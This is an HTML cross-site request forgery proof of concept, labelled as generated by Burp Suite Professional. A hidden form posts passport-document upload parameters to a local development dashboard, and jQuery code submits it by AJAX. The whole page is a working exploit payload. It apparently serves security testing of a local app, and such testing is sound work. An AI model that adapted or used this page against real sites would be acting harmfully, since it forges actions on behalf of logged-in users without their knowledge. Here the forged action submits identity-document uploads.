<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form id="upload" action="http://dashboard.lvh.me:3000/registrations/documents/new.13285">
      <input type="hidden" name="filename" value="test.jpg" />
      <input type="hidden" name="content_length" value="4856" />
      <input type="hidden" name="content_type" value="image/jpeg" />
      <input type="hidden" name="kind" value="passport_document" />
      <input type="submit" value="Submit request" />
    </form>
    <script src="/www/jquery-3.3.1.min.js"></script>
    <script>
     console.log($("#upload"));
     console.log(document);
     $("#upload").submit(function(event) {
	 event.preventDefault();
	 console.log(event);
	 $.ajax({
             data: $(this).serialize(),
             type: $(this).attr('method'),
             url: $(this).attr('action'),
             success: function(data) {
		 console.log(data);
                 alert("Data successfully forwarded to add.php");
             },
	     error: function(data) {
		 console.log(data);
		 alert("Error");
	     }
         });
         return false;
     });
    </script>
  </body>
</html>
